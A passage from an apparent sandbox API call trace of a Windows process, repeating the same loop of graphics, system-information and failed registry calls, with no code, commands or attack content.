samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.410] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x8704027d [0017.410] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x91040713 [0017.410] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x2040854 [0017.410] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x3040853 [0017.410] CombineRgn (hrgnDst=0x2040854, hrgnSrc1=0x8704027d, hrgnSrc2=0x91040713, iMode=1) returned 1 [0017.410] CombineRgn (hrgnDst=0x3040853, hrgnSrc1=0x8704027d, hrgnSrc2=0x91040713, iMode=4) returned 2 [0017.410] CreateSolidBrush (color=0xff) returned 0x510086a [0017.410] CreateSolidBrush (color=0xff0000) returned 0x2100851 [0017.410] DeleteObject (ho=0x2100851) returned 1 [0017.410] DeleteObject (ho=0x91040713) returned 1 [0017.410] DeleteObject (ho=0x8704027d) returned 1 [0017.411] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.411] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.411] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.411] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.411] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.411] BeginPath (hdc=0x0) returned 0 [0017.411] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.411] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.411] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.411] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.411] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.411] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.411] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.411] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.411] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x92040713 [0017.411] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x8804027d [0017.411] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x204084f [0017.411] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x4040849 [0017.411] CombineRgn (hrgnDst=0x204084f, hrgnSrc1=0x92040713, hrgnSrc2=0x8804027d, iMode=1) returned 1 [0017.411] CombineRgn (hrgnDst=0x4040849, hrgnSrc1=0x92040713, hrgnSrc2=0x8804027d, iMode=4) returned 2 [0017.411] CreateSolidBrush (color=0xff) returned 0x3100851 [0017.411] CreateSolidBrush (color=0xff0000) returned 0x5100873 [0017.412] DeleteObject (ho=0x5100873) returned 1 [0017.412] DeleteObject (ho=0x8804027d) returned 1 [0017.412] DeleteObject (ho=0x92040713) returned 1 [0017.412] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.412] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.412] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.412] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.412] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.412] BeginPath (hdc=0x0) returned 0 [0017.412] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.412] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.412] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.412] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.412] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.412] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.412] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.412] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.412] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x8904027d [0017.412] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x93040713 [0017.412] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x3040847 [0017.412] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x6040881 [0017.412] CombineRgn (hrgnDst=0x3040847, hrgnSrc1=0x8904027d, hrgnSrc2=0x93040713, iMode=1) returned 1 [0017.412] CombineRgn (hrgnDst=0x6040881, hrgnSrc1=0x8904027d, hrgnSrc2=0x93040713, iMode=4) returned 2 [0017.412] CreateSolidBrush (color=0xff) returned 0x6100873 [0017.412] CreateSolidBrush (color=0xff0000) returned 0x9100876 [0017.412] DeleteObject (ho=0x9100876) returned 1 [0017.412] DeleteObject (ho=0x93040713) returned 1 [0017.412] DeleteObject (ho=0x8904027d) returned 1 [0017.412] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.412] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.413] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.413] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.413] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.413] BeginPath (hdc=0x0) returned 0 [0017.413] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.413] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.413] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.413] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.413] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.413] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.413] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.413] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.413] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x94040713 [0017.413] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x8a04027d [0017.413] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x7040879 [0017.413] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x404087a [0017.413] CombineRgn (hrgnDst=0x7040879, hrgnSrc1=0x94040713, hrgnSrc2=0x8a04027d, iMode=1) returned 1 [0017.413] CombineRgn (hrgnDst=0x404087a, hrgnSrc1=0x94040713, hrgnSrc2=0x8a04027d, iMode=4) returned 2 [0017.413] CreateSolidBrush (color=0xff) returned 0xa100876 [0017.413] CreateSolidBrush (color=0xff0000) returned 0x3100882 [0017.413] DeleteObject (ho=0x3100882) returned 1 [0017.413] DeleteObject (ho=0x8a04027d) returned 1 [0017.413] DeleteObject (ho=0x94040713) returned 1 [0017.413] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.413] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.413] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.413] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.413] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.413] BeginPath (hdc=0x0) returned 0 [0017.413] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.413] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.414] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.414] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.414] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.414] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.414] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.414] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.414] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x8b04027d [0017.414] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x95040713 [0017.414] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x6040868 [0017.414] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x604087d [0017.414] CombineRgn (hrgnDst=0x6040868, hrgnSrc1=0x8b04027d, hrgnSrc2=0x95040713, iMode=1) returned 1 [0017.414] CombineRgn (hrgnDst=0x604087d, hrgnSrc1=0x8b04027d, hrgnSrc2=0x95040713, iMode=4) returned 2 [0017.414] CreateSolidBrush (color=0xff) returned 0x4100882 [0017.414] CreateSolidBrush (color=0xff0000) returned 0x2100869 [0017.414] DeleteObject (ho=0x2100869) returned 1 [0017.414] DeleteObject (ho=0x95040713) returned 1 [0017.414] DeleteObject (ho=0x8b04027d) returned 1 [0017.414] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.414] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.414] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.414] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.414] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.414] BeginPath (hdc=0x0) returned 0 [0017.414] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.414] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.414] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.414] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.414] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.414] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.414] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.415] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.415] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x96040713 [0017.415] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x8c04027d [0017.415] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x3040866 [0017.415] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x3040865 [0017.415] CombineRgn (hrgnDst=0x3040866, hrgnSrc1=0x96040713, hrgnSrc2=0x8c04027d, iMode=1) returned 1 [0017.415] CombineRgn (hrgnDst=0x3040865, hrgnSrc1=0x96040713, hrgnSrc2=0x8c04027d, iMode=4) returned 2 [0017.415] CreateSolidBrush (color=0xff) returned 0x3100869 [0017.415] CreateSolidBrush (color=0xff0000) returned 0x4100846 [0017.415] DeleteObject (ho=0x4100846) returned 1 [0017.415] DeleteObject (ho=0x8c04027d) returned 1 [0017.415] DeleteObject (ho=0x96040713) returned 1 [0017.415] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.415] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.415] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.415] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.415] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.415] BeginPath (hdc=0x0) returned 0 [0017.415] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.415] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.415] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.415] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.415] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.415] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.415] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.415] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.416] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x8d04027d [0017.416] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x97040713 [0017.416] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x704083e [0017.416] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1d04087f [0017.416] CombineRgn (hrgnDst=0x704083e, hrgnSrc1=0x8d04027d, hrgnSrc2=0x97040713, iMode=1) returned 1 [0017.416] CombineRgn (hrgnDst=0x1d04087f, hrgnSrc1=0x8d04027d, hrgnSrc2=0x97040713, iMode=4) returned 2 [0017.416] CreateSolidBrush (color=0xff) returned 0x5100846 [0017.416] CreateSolidBrush (color=0xff0000) returned 0x810087b [0017.416] DeleteObject (ho=0x810087b) returned 1 [0017.416] DeleteObject (ho=0x97040713) returned 1 [0017.416] DeleteObject (ho=0x8d04027d) returned 1 [0017.416] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.416] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.416] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.416] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.416] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.416] BeginPath (hdc=0x0) returned 0 [0017.416] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.416] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.416] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.416] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.416] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.416] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.416] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.416] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.416] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x98040713 [0017.416] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x8e04027d [0017.416] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x204087c [0017.416] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x3040880 [0017.417] CombineRgn (hrgnDst=0x204087c, hrgnSrc1=0x98040713, hrgnSrc2=0x8e04027d, iMode=1) returned 1 [0017.417] CombineRgn (hrgnDst=0x3040880, hrgnSrc1=0x98040713, hrgnSrc2=0x8e04027d, iMode=4) returned 2 [0017.417] CreateSolidBrush (color=0xff) returned 0x910087b [0017.417] CreateSolidBrush (color=0xff0000) returned 0x710087e [0017.417] DeleteObject (ho=0x710087e) returned 1 [0017.417] DeleteObject (ho=0x8e04027d) returned 1 [0017.417] DeleteObject (ho=0x98040713) returned 1 [0017.417] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.417] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.417] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.417] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.417] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.417] BeginPath (hdc=0x0) returned 0 [0017.417] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.417] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.417] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.417] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.417] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.417] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.417] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.417] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.417] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x8f04027d [0017.417] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x99040713 [0017.417] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x2040883 [0017.417] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040884 [0017.417] CombineRgn (hrgnDst=0x2040883, hrgnSrc1=0x8f04027d, hrgnSrc2=0x99040713, iMode=1) returned 1 [0017.417] CombineRgn (hrgnDst=0x1040884, hrgnSrc1=0x8f04027d, hrgnSrc2=0x99040713, iMode=4) returned 2 [0017.417] CreateSolidBrush (color=0xff) returned 0x810087e [0017.417] CreateSolidBrush (color=0xff0000) returned 0x1100885 [0017.417] DeleteObject (ho=0x1100885) returned 1 [0017.417] DeleteObject (ho=0x99040713) returned 1 [0017.417] DeleteObject (ho=0x8f04027d) returned 1 [0017.418] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.418] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.418] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.418] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.418] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.418] BeginPath (hdc=0x0) returned 0 [0017.418] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.418] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.418] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.418] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.418] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.418] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.418] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.418] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.418] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x9a040713 [0017.418] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x9004027d [0017.418] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040886 [0017.418] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040887 [0017.418] CombineRgn (hrgnDst=0x1040886, hrgnSrc1=0x9a040713, hrgnSrc2=0x9004027d, iMode=1) returned 1 [0017.418] CombineRgn (hrgnDst=0x1040887, hrgnSrc1=0x9a040713, hrgnSrc2=0x9004027d, iMode=4) returned 2 [0017.418] CreateSolidBrush (color=0xff) returned 0x2100885 [0017.418] CreateSolidBrush (color=0xff0000) returned 0x1100888 [0017.418] DeleteObject (ho=0x1100888) returned 1 [0017.418] DeleteObject (ho=0x9004027d) returned 1 [0017.418] DeleteObject (ho=0x9a040713) returned 1 [0017.418] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, 